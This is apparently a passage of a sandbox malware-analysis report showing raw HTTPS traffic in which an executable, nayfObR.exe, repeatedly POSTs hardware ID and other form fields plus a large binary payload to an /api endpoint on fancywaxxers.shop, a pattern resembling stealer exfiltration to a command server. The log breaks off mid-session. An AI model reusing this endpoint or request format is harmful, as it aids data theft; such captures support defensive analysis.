                                                                                          Data Ascii: --PDDNHW1VYContent-Disposition: form-data; name="hwid"50377D4341EF35CB822D1F4978021086--PDDNHW1VYContent-Disposition: form-data; name="pid"2--PDDNHW1VYContent-Disposition: form-data; name="lid"7tx2jo--516--PDDNHW1VYContent-Dispos
                                                                                          2025-01-03 13:34:01 UTC1138INHTTP/1.1 200 OK
                                                                                          Date: Fri, 03 Jan 2025 13:34:01 GMT
                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: close
                                                                                          Set-Cookie: PHPSESSID=qgglau9hch426nqp73lugb4q33; expires=Tue, 29 Apr 2025 07:20:40 GMT; Max-Age=9999999; path=/
                                                                                          Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                          Cache-Control: no-store, no-cache, must-revalidate
                                                                                          Pragma: no-cache
                                                                                          X-Frame-Options: DENY
                                                                                          X-Content-Type-Options: nosniff
                                                                                          X-XSS-Protection: 1; mode=block
                                                                                          cf-cache-status: DYNAMIC
                                                                                          vary: accept-encoding
                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=4K3uTMI5orQ3NZ%2BXZ7Qwbo0%2FSW8ik%2BTj28fSgJWJMPeVqsjLxQeAv01YgshHffnZMLl%2FGiitCSPOJxyEcO1pp7zHFV79%2BYyG6r%2BUPt2D9CTtPKgHJ3PujkkzaremzI0g10vkGA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                          Server: cloudflare
                                                                                          CF-RAY: 8fc35d294ad51875-EWR
                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1578&min_rtt=1568&rtt_var=608&sent=9&recv=18&lost=0&retrans=0&sent_bytes=2844&recv_bytes=15953&delivery_rate=1769696&cwnd=153&unsent_bytes=0&cid=93f64c74fdb18d35&ts=506&x=0"
                                                                                          2025-01-03 13:34:01 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                          Data Ascii: fok 8.46.123.189
                                                                                          2025-01-03 13:34:01 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                          Data Ascii: 0


                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                          4192.168.2.549708104.21.32.14436540C:\Users\user\Desktop\nayfObR.exe
                                                                                          TimestampBytes transferredDirectionData
                                                                                          2025-01-03 13:34:02 UTC274OUTPOST /api HTTP/1.1
                                                                                          Connection: Keep-Alive
                                                                                          Content-Type: multipart/form-data; boundary=PAI49V4K5
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                          Content-Length: 20511
                                                                                          Host: fancywaxxers.shop
                                                                                          2025-01-03 13:34:02 UTC15331OUTData Raw: 2d 2d 50 41 49 34 39 56 34 4b 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 35 30 33 37 37 44 34 33 34 31 45 46 33 35 43 42 38 32 32 44 31 46 34 39 37 38 30 32 31 30 38 36 0d 0a 2d 2d 50 41 49 34 39 56 34 4b 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 33 0d 0a 2d 2d 50 41 49 34 39 56 34 4b 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 37 74 78 32 6a 6f 2d 2d 35 31 36 0d 0a 2d 2d 50 41 49 34 39 56 34 4b 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73
                                                                                          Data Ascii: --PAI49V4K5Content-Disposition: form-data; name="hwid"50377D4341EF35CB822D1F4978021086--PAI49V4K5Content-Disposition: form-data; name="pid"3--PAI49V4K5Content-Disposition: form-data; name="lid"7tx2jo--516--PAI49V4K5Content-Dispos
                                                                                          2025-01-03 13:34:02 UTC5180OUTData Raw: 00 00 00 00 00 00 00 00 00 00 80 75 6e 20 0a e6 d6 fd 34 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b0 ce 0d 46 c1 dc ba 9f 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d6 b9 81 28 98 5b f7 d3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 3a 37 18 05 73 eb 7e 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 58 e7 06 a2 60 6e dd 4f 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 eb dc 60 14 cc ad fb 69 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 9d 1b 88 82 b9 75
                                                                                          Data Ascii: un 4F([:7s~X`nO`i`u
                                                                                          2025-01-03 13:34:03 UTC1136INHTTP/1.1 200 OK
                                                                                          Date: Fri, 03 Jan 2025 13:34:03 GMT
                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: close
                                                                                          Set-Cookie: PHPSESSID=b2mutrto1h75dhdlacn7cc076i; expires=Tue, 29 Apr 2025 07:20:42 GMT; Max-Age=9999999; path=/
                                                                                          Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                          Cache-Control: no-store, no-cache, must-revalidate
                                                                                          Pragma: no-cache
                                                                                          X-Frame-Options: DENY
                                                                                          X-Content-Type-Options: nosniff
                                                                                          X-XSS-Protection: 1; mode=block
                                                                                          cf-cache-status: DYNAMIC
                                                                                          vary: accept-encoding
                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=2kNOWHwOAUbWJVk0E%2BYxNkpTahmZy27AfAgda846N4KnNVLpTy6NNLEZNJ%2BHDfGmsjOruJQyuJjAB0%2F6WHhSAHusQETS7isNKftum8OWpVGd3oHNaAHufW%2Bj9I2E0QjhxgptMw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                          Server: cloudflare
                                                                                          CF-RAY: 8fc35d3069538cda-EWR
                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1767&min_rtt=1755&rtt_var=682&sent=11&recv=26&lost=0&retrans=0&sent_bytes=2844&recv_bytes=21465&delivery_rate=1575822&cwnd=242&unsent_bytes=0&cid=57d3ff2f2a3bf646&ts=1635&x=0"
                                                                                          2025-01-03 13:34:03 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                          Data Ascii: fok 8.46.123.189
                                                                                          2025-01-03 13:34:03 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                          Data Ascii: 0


                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                          5192.168.2.549709104.21.32.14436540C:\Users\user\Desktop\nayfObR.exe
                                                                                          TimestampBytes transferredDirectionData
                                                                                          2025-01-03 13:34:04 UTC279OUTPOST /api HTTP/1.1
                                                                                          Connection: Keep-Alive
                                                                                          Content-Type: multipart/form-data; boundary=I0TGGFGD09V4Z2V8
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                          Content-Length: 952
                                                                                          Host: fancywaxxers.shop
                                                                                          2025-01-03 13:34:04 UTC952OUTData Raw: 2d 2d 49 30 54 47 47 46 47 44 30 39 56 34 5a 32 56 38 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 35 30 33 37 37 44 34 33 34 31 45 46 33 35 43 42 38 32 32 44 31 46 34 39 37 38 30 32 31 30 38 36 0d 0a 2d 2d 49 30 54 47 47 46 47 44 30 39 56 34 5a 32 56 38 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 49 30 54 47 47 46 47 44 30 39 56 34 5a 32 56 38 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 37 74 78 32 6a 6f 2d 2d 35 31 36 0d 0a 2d 2d 49 30 54 47
                                                                                          Data Ascii: --I0TGGFGD09V4Z2V8Content-Disposition: form-data; name="hwid"50377D4341EF35CB822D1F4978021086--I0TGGFGD09V4Z2V8Content-Disposition: form-data; name="pid"1--I0TGGFGD09V4Z2V8Content-Disposition: form-data; name="lid"7tx2jo--516--I0TG
                                                                                          2025-01-03 13:34:12 UTC1143INHTTP/1.1 200 OK
                                                                                          Date: Fri, 03 Jan 2025 13:34:12 GMT
                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: close
                                                                                          Set-Cookie: PHPSESSID=ae97ik6g415ckonectgdfrihne; expires=Tue, 29 Apr 2025 07:20:51 GMT; Max-Age=9999999; path=/
                                                                                          Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                          Cache-Control: no-store, no-cache, must-revalidate
                                                                                          Pragma: no-cache
                                                                                          X-Frame-Options: DENY
                                                                                          X-Content-Type-Options: nosniff
                                                                                          X-XSS-Protection: 1; mode=block
                                                                                          cf-cache-status: DYNAMIC
                                                                                          vary: accept-encoding
                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2FhDGI%2FpHhwwo6lGXvsJHRcN8fJ%2BcDGC5ZOJw0TzPndhVnzzokttCGRguJ%2B%2B4U5%2FfAFAuUpznH5v08o5FmiaY%2FOCj2t%2BXD8LwyOoFJjVdgDgPGc3Tj0B0GjLTqe1u9okG%2Bv8GBA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                          Server: cloudflare
                                                                                          CF-RAY: 8fc35d406ad78cda-EWR
                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1817&min_rtt=1811&rtt_var=692&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2843&recv_bytes=1867&delivery_rate=1565683&cwnd=242&unsent_bytes=0&cid=1234632422bd42d2&ts=7598&x=0"
                                                                                          2025-01-03 13:34:12 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                          Data Ascii: fok 8.46.123.189
                                                                                          2025-01-03 13:34:12 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                          Data Ascii: 0


                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                          6192.168.2.549710104.21.32.14436540C:\Users\user\Desktop\nayfObR.exe
                                                                                          TimestampBytes transferredDirectionData
                                                                                          2025-01-03 13:34:13 UTC275OUTPOST /api HTTP/1.1
                                                                                          Connection: Keep-Alive
                                                                                          Content-Type: multipart/form-data; boundary=6RJDBLF9V
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                          Content-Length: 585960
                                                                                          Host: fancywaxxers.shop
                                                                                          2025-01-03 13:34:13 UTC15331OUTData Raw: 2d 2d 36 52 4a 44 42 4c 46 39 56 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 35 30 33 37 37 44 34 33 34 31 45 46 33 35 43 42 38 32 32 44 31 46 34 39 37 38 30 32 31 30 38 36 0d 0a 2d 2d 36 52 4a 44 42 4c 46 39 56 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 36 52 4a 44 42 4c 46 39 56 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 37 74 78 32 6a 6f 2d 2d 35 31 36 0d 0a 2d 2d 36 52 4a 44 42 4c 46 39 56 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73
                                                                                          Data Ascii: --6RJDBLF9VContent-Disposition: form-data; name="hwid"50377D4341EF35CB822D1F4978021086--6RJDBLF9VContent-Disposition: form-data; name="pid"1--6RJDBLF9VContent-Disposition: form-data; name="lid"7tx2jo--516--6RJDBLF9VContent-Dispos
                                                                                          2025-01-03 13:34:13 UTC15331OUTData Raw: e4 5d 60 69 d9 ce fd f2 b4 72 93 20 21 bd f3 d5 e3 42 16 46 aa b0 ef c1 27 cc 77 85 0e 7d 5c 9e 38 ad 1c 5d 25 08 c4 2a 27 9f e7 03 ea 54 03 56 bb fc d4 82 43 af c1 af a7 ab 95 ae ff c9 a1 60 71 ce c8 eb 07 a1 ae a2 ac c5 df d4 f6 c7 f0 47 27 18 c0 17 e5 5b 6d 0f ca db 20 3f f7 0b d8 b9 31 3b 9e e9 b2 fe e7 0f ca dc 99 55 7e 77 2b 81 c9 6e 48 1e 19 bd 37 f6 80 fd 48 57 a9 53 60 6f fe 5b 68 3b ea f2 18 b0 4b be fc 6f 43 67 5d 35 c2 0f 3a c0 1c 0e 11 9b d4 7c 04 70 bc 12 01 92 4c d3 06 73 34 d6 3f 99 55 40 09 90 44 71 77 50 42 f6 c7 c1 5b 9b 94 0b 9d 76 10 73 9f 5c bf 30 70 7c 90 e9 ec 83 03 2d f3 9b de 16 e8 78 c9 a7 ce e5 90 92 06 4c 95 e4 97 ea d2 82 36 df a7 45 26 7e 30 67 89 76 cb d1 2f 70 a1 b8 11 15 b1 e7 3f 27 35 78 53 7a 49 d4 1a 2b 45 9d 21 58 a1
                                                                                          Data Ascii: ]`ir !BF'w}\8]%*'TVC`qG'[m ?1;U~w+nH7HWS`o[h;KoCg]5:|pLs4?U@DqwPB[vs\0p|-xL6E&~0gv/p?'5xSzI+E!X
                                                                                          2025-01-03 13:34:13 UTC15331OUTData Raw: ed 83 b9 d4 af 51 25 ba d8 db 7c ca ac a0 af 00 38 bb 4d 0f 72 ef ec 98 61 38 6d 56 0e 2c 55 ee 58 b0 3f c0 6b 1f 0a 1e 4f 5c b8 a9 78 99 5e b7 3e bf 38 68 a6 b7 b8 a2 43 ff a3 05 10 3b 17 a3 8e 68 05 e5 64 fa bf 30 d9 98 7a ea 7c 75 38 41 65 6f f5 4c 7d b7 c9 9e ac aa 6d 68 f8 01 83 48 49 42 81 78 33 af b6 1a eb 41 86 3c 37 94 d7 4d 1f fa df 73 2a 4f 03 fa ee df da e3 a1 17 04 22 2e 80 f0 a1 9b e1 1e 80 2d fb 14 80 93 66 a0 3f 1c f4 5f 9f f1 41 be 2d 06 14 9e 13 b7 f9 7f 0f e7 49 3a 2a 60 f3 5a 14 41 cf 82 50 63 45 13 43 00 e0 31 c2 cd 20 ab a1 b6 ba a9 b1 1c 1d c0 7c 50 33 52 6b cd c1 ca d2 70 23 52 60 d5 43 cb fc fc dc 89 dd d3 3a 3e 41 77 46 77 8a d3 b0 70 75 73 d1 3f 87 6f bd 1e 5b 2d 6e a7 00 73 4d 01 57 34 12 54 83 12 62 ca 1d 96 8e 98 dd c4 56 6c
                                                                                          Data Ascii: Q%|8Mra8mV,UX?kO\x^>8hC;hd0z|u8AeoL}mhHIBx3A<7Ms*O".-f?_A-I:*`ZAPcEC1 |P3Rkp#R`C:>AwFwpus?o[-nsMW4TbVl
                                                                                          2025-01-03 13:34:13 UTC15331OUTData Raw: c8 45 7d 10 a9 18 2f 8e de b3 9b 5d 78 94 c9 77 f8 c8 78 05 5d 61 a6 25 4b 5e 49 c1 39 cc 01 5c 81 65 d6 19 f9 0b 38 c4 f6 1a 83 06 97 5b 08 bf 7b f4 33 db c9 5c a7 54 0f 9e e4 a7 70 5a 57 98 14 07 fe 85 95 af d8 8d 95 fa 57 07 ac 96 55 7c 53 25 6d a9 05 38 a6 54 3f 3f f9 e0 07 e7 20 38 12 72 49 04 f0 36 65 90 48 43 82 34 b0 4b b9 98 11 28 d4 64 6f ec a8 e6 9b 15 64 29 5d d3 5d 06 08 fb b7 b5 a2 e6 d9 0b 25 82 af c5 80 e8 c1 ab 23 8e ca 60 a3 87 13 cc 91 e4 ae ce fa 14 7d 60 4d 0b 71 b6 d0 15 eb aa d4 b2 1c 6e e4 37 bf 9e cf ec c9 82 f9 d6 60 b3 7a ef 3f 5c 83 af dc f8 1e 01 9a 2a e8 29 bc 3d f9 d6 28 f5 64 b6 48 3d 5b b2 5c 9d f8 96 5e 6b d3 b8 f8 32 75 ed 89 59 f1 6f a1 34 c5 73 06 dc 93 bc 68 eb d0 e6 fa ea 80 13 5e 74 90 96 56 91 b7 b1 3c 32 fd c8 e1
                                                                                          Data Ascii: E}/]xwx]a%K^I9\e8[{3\TpZWWU|S%m8T?? 8rI6eHC4K(dod)]]%#`}`Mqn7`z?\*)=(dH=[\^k2uYo4sh^tV<2
                                                                                          2025-01-03 13:34:13 UTC15331OUTData Raw: 3e c7 d4 bb 5d 1f c1 c7 1d 74 c2 77 bc ff b0 cc f6 fc 27 06 5e 7e f7 f5 9c 89 ec 58 97 3b 45 9f 4f eb 8a dc 7f a8 47 70 70 a0 f5 34 de 3c 44 1c de df ac 11 4e 38 78 78 e6 37 ed a8 65 4e 64 22 23 be c0 58 60 5c ac c6 5e 37 6f e1 cc 68 96 be 80 97 af 86 7c 34 ff 4a 7e 87 fa f1 dd ed 70 bc c0 2e ad cb a7 89 99 11 f8 e7 f7 da bb 72 97 39 25 82 27 e6 7d 2e 3b 47 61 86 a1 7b f2 18 41 29 c4 7a 43 66 30 bb 58 23 f7 85 14 1e 73 0e e4 ed 11 8c 52 a6 54 5c b4 eb 8f 42 2c 24 ce d6 ea 2b 7a ff df a9 fa ff df 05 52 21 cb 13 30 21 38 b0 5a 47 53 f4 81 16 1c 1a 8f e9 07 6f 5b 41 2a b1 0e 97 80 40 70 ce a4 71 fd 1c 81 4d b8 2b 1a c0 57 44 d6 a2 bb d1 a0 94 a7 3c 0f 1f a5 91 f4 d3 65 78 ac b5 21 c8 7a af 26 6f 1b fd df d1 74 f3 10 33 08 43 5e 96 06 82 3f 84 3b 03 8b bc 40
                                                                                          Data Ascii: >]tw'^~X;EOGpp4<DN8xx7eNd"#X`\^7oh|4J~p.r9%'}.;Ga{A)zCf0X#sRT\B,$+zR!0!8ZGSo[A*@pqM+WD<ex!z&ot3C^?;@
                                                                                          2025-01-03 13:34:13 UTC15331OUTData Raw: 3b ea 5c be 5b fc ee b5 2e 9a 4c d7 01 75 e1 31 b3 17 67 a9 cb 7c 43 f9 a8 f0 b3 84 47 7b 3c 82 52 91 26 0a 55 d7 7c d8 c9 83 61 63 b1 6d f6 43 06 3c 28 b7 e5 c8 7a ca 73 27 0f 9f 8d e4 1a e2 19 ea f3 77 71 27 5f 8f 0a e0 90 0d a6 0c b9 b1 aa 04 4c 54 00 0e b8 35 99 cb 50 b4 33 61 0f 4d 7c a1 89 b6 04 fa f8 0c 35 08 82 b8 57 85 57 0e 4f 8d 05 92 fa 55 e7 06 43 8d 94 7e 36 6d 98 82 46 0b d5 c4 90 78 24 b6 64 45 40 5f 0f b9 b6 79 c1 37 79 68 36 29 66 a7 6f 51 75 e5 a7 7f 50 6a 2f d5 ef 1a c9 29 ad f2 41 73 11 64 fd 2a a5 74 bb e0 c4 3e 14 30 b3 fa fb 1d 3d d7 0c 34 06 94 02 38 77 45 ad f6 05 48 f4 8f 7b 66 e8 c4 13 e2 1c 0d 56 39 6b 5a 45 7f 90 b3 09 eb dd 7f 58 0a 64 e1 3c 47 bd dd cb 5c 66 1d 15 2a 4e b1 a5 42 a9 fe 67 09 0b 32 63 29 a6 d8 c6 d3 81 a9 bf
                                                                                          Data Ascii: ;\[.Lu1g|CG{<R&U|acmC<(zs'wq'_LT5P3aM|5WWOUC~6mFx$dE@_y7yh6)foQuPj/)Asd*t>0=48wEH{fV9kZEXd<G\f*NBg2c)
                                                                                          2025-01-03 13:34:13 UTC15331OUTData Raw: 68 c9 41 80 a1 6d 90 d7 7d 04 bc 3f aa 2a b0 b0 3c b9 9c 55 a3 1b 83 99 b5 1c 36 91 46 92 fe a5 a4 ac 21 af 33 55 22 44 e9 96 cb c9 14 23 80 6f 26 52 2b 6c cb 7c ce c6 12 ab 0e 6f f7 7c a7 c8 ee a4 b7 0c 77 be 4f d4 f2 2d f5 e4 cc bb 73 7c e8 4b 8b 9f 29 eb ee ef 7e a8 2f fe 04 a4 0c 1f 46 92 fe 0b 04 6d 7f 40 e9 95 9e 1d 31 24 cd fc ae 97 cb 2d e0 61 a4 05 96 9a 37 ed fd 26 be 73 84 8a c9 99 98 10 53 1c 60 17 df ca 78 d1 99 b3 99 fc dd 56 09 ca b2 c9 f0 fe ee 9b 8e 02 7f ca 90 9c fc 37 57 41 46 9b 25 0e 7c 1a e1 a2 16 9e 2e 4b fc ec 7b 1b 2e 51 69 fe 01 42 25 cc 35 ff 60 de 4d d1 b9 27 ce 38 86 d1 fa d9 63 6b d6 2c 87 e7 f5 37 3a c7 76 ac 02 ef ba b2 65 cd f7 1d f7 99 64 5e 5a 3f dd 7f fc cb f0 33 24 2c e0 61 99 b4 be 58 35 7b 95 07 1b 73 24 8a 53 94 9a
                                                                                          Data Ascii: hAm}?*<U6F!3U"D#o&R+l|o|wO-s|K)~/Fm@1$-a7&sS`xV7WAF%|.K{.QiB%5`M'8ck,7:ved^Z?3$,aX5{s$S
                                                                                          2025-01-03 13:34:13 UTC15331OUTData Raw: 11 b0 93 af 4f eb c9 2f 3d b5 a0 1a 41 a4 73 ad 76 48 7c 7a c8 82 7a 1b 0e 7a 09 18 18 cc ac 77 34 b3 1c 0f f2 76 49 81 bd cc a3 0d f5 ee 80 b2 0f 9f 11 1b 3d 20 02 0a b3 57 fd 5b 8f 98 31 5e 09 80 3d 2d b0 3a 3e f3 18 70 12 c7 06 3e 15 eb 9a e1 01 07 78 5c b1 c0 e5 30 6c 0f ec 46 47 e0 52 cc 4b 31 fc 99 77 b4 6f a3 3e 6e d1 af ba 08 e0 12 3b 5d 99 fd f0 da 60 93 19 01 65 ff 99 c2 07 8d 1f 23 a3 39 fe fb f1 2a 0c 95 56 13 b9 f6 9f 98 1d 8c 5b 17 94 b0 00 93 26 db 68 44 36 58 75 c2 9c 02 64 73 72 42 92 a7 04 e5 24 40 11 33 e4 ab 0f 98 93 2f 91 99 ca 50 8e c1 ef fb 03 67 4d 51 75 aa d5 ab 37 1b d3 1c ee e0 b3 62 a7 d7 ec 81 14 78 34 fb d2 0b 09 12 4f af a0 97 8c c6 eb 4f 1f 6f e8 5e cd 17 6c 58 2c 6c 63 bd 5c 08 75 49 6b 81 bd 2c 2b 01 3c bd e6 b5 43 6a 3f
                                                                                          Data Ascii: O/=AsvH|zzzw4vI= W[1^=-:>p>x\0lFGRK1wo>n;]`e#9*V[&hD6XudsrB$@3/PgMQu7bx4OOo^lX,lc\uIk,+<Cj?
                                                                                          2025-01-03 13:34:13 UTC15331OUTData Raw: 57 02 5a 21 59 37 09 3d b6 ce f2 96 38 d2 10 4d cf b6 69 1b 05 d0 18 31 ba 75 4e 6b 78 b4 de b9 89 91 4e 49 c5 0e d9 e8 e4 2d 24 8d 8b df e2 93 44 ec 42 4a d9 39 0d 52 3b 84 e6 c5 05 7c 2d ae 86 5e 89 a1 5a 54 e9 6d a8 27 8d 72 e4 fb 5b 3e e2 83 30 cf 7c 9f 3e 4d 02 75 ef 01 ad f6 8d ca 99 1f 24 bb 23 a6 53 9b 5f 83 87 2a 7e 90 74 44 5c af 40 0a 77 2c ea 46 f3 e6 f9 ac 63 4d 66 40 d7 cc 97 41 06 0a 5c 69 51 1c a0 bd e6 79 9f 3e 47 73 01 31 fe bc de bf d2 81 dd 24 fb a7 1a b9 1a e1 7d d7 0c c6 ea 3a 09 85 b6 e4 36 2e 5a 8e 7f 65 93 c0 7a 24 71 bd f7 86 87 0b e6 af 2b dc cf 7b a4 60 0a 1c 5d 05 50 f9 f2 61 a1 f1 70 12 4a 74 16 1a 13 5e 7c be 85 70 16 92 9d 59 ae 01 36 48 01 8c 72 3e 1d 67 d4 3c 43 c2 a7 58 a3 d4 9e 67 d8 0c 62 27 a1 53 88 45 27 62 58 b6 ac
                                                                                          Data Ascii: WZ!Y7=8Mi1uNkxNI-$DBJ9R;|-^ZTm'r[>0|>Mu$#S_*~tD\@w,FcMf@A\iQy>Gs1$}:6.Zez$q+{`]PapJt^|pY6Hr>g<CXgb'SE'bX
                                                                                          2025-01-03 13:34:13 UTC15331OUTData Raw: b7 7e 30 f3 36 8c f7 8c b1 92 d8 b3 9e a2 91 43 33 5d 52 be 80 72 36 0f 94 41 fc 3c 25 3b 44 13 06 ee 3b f3 89 28 b8 a2 18 d3 f7 c0 2e 51 bc ff df 57 a8 ab 52 3d b5 b4 0f 81 c2 73 c7 6d e8 b4 0e 92 0a 0a 64 a9 5e a0 c2 70 38 6a 07 58 40 ad ed 62 e5 d2 a8 28 18 15 8f a2 e1 61 c2 20 5c 81 b1 37 13 c4 be a3 02 62 8b 3b 00 b0 e7 72 10 ff 36 4c 30 86 d4 b7 da be 8f 9c 74 c0 bd bd 56 a5 bf 3b 5e 3d 47 b8 e5 00 1e 7b 8e e2 00 51 bc 7e d6 67 ff 2d f8 40 78 68 60 07 0b 18 e5 8e 71 c7 09 9f c3 16 15 75 fc 9c af ab 05 c5 a4 dd d1 d0 9a c2 ea 5b 23 84 07 02 c1 c6 40 a8 2e f1 d4 b0 c6 aa 35 ab 4a 4e 3a 08 0d 25 91 1b 63 10 5c a4 18 ea 3d 72 fb 93 63 f8 be 24 38 7c f5 af 12 cb ba e2 d2 7d 3c a2 ff f1 8b 90 aa 94 d4 8c 0b 6b 92 22 68 86 9b 05 b2 41 b5 10 74 5e 9e 23 27
                                                                                          Data Ascii: ~06C3]Rr6A<%;D;(.QWR=smd^p8jX@b(a \7b;r6L0tV;^=G{Q~g-@xh`qu[#@.5JN:%c\=rc$8|}<k"hAt^#'
                                                                                          2025-01-03 13:34:15 UTC1133INHTTP/1.1 200 OK
                                                                                          Date: Fri, 03 Jan 2025 13:34:14 GMT
                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: close
                                                                                          Set-Cookie: PHPSESSID=6gfufi03h7clqfi005oi8dh8vl; expires=Tue, 29 Apr 2025 07:20:53 GMT; Max-Age=9999999; path=/
                                                                                          Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                          Cache-Control: no-store, no-cache, must-revalidate
                                                                                          Pragma: no-cache
                                                                                          X-Frame-Options: DENY
                                                                                          X-Content-Type-Options: nosniff
                                                                                          X-XSS-Protection: 1; mode=block
                                                                                          cf-cache-status: DYNAMIC
                                                                                          vary: accept-encoding
                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=y5hUZc5qkmUANtmwcWPBTvfZEW7L3omvgaHOI6NBwG2Z%2FCGGwM4mIjkruaQjm688PMS60hMz2miR7epHCx58JYePOsVz3aNknWmVMH0CUTYzmkrAZNvRtNSFsSU9xWT6SW4H3Q%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                          Server: cloudflare
                                                                                          CF-RAY: 8fc35d755baa8cda-EWR
                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1790&min_rtt=1780&rtt_var=689&sent=201&recv=602&lost=0&retrans=0&sent_bytes=2843&recv_bytes=588543&delivery_rate=1564844&cwnd=242&unsent_bytes=0&cid=70fafba9ff31771f&ts=1659&x=0"


                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                          7192.168.2.549716104.21.32.14436540C:\Users\user\Desktop\nayfObR.exe
                                                                                          TimestampBytes transferredDirectionData
                                                                                          2025-01-03 13:34:15 UTC265OUTPOST /api HTTP/1.1
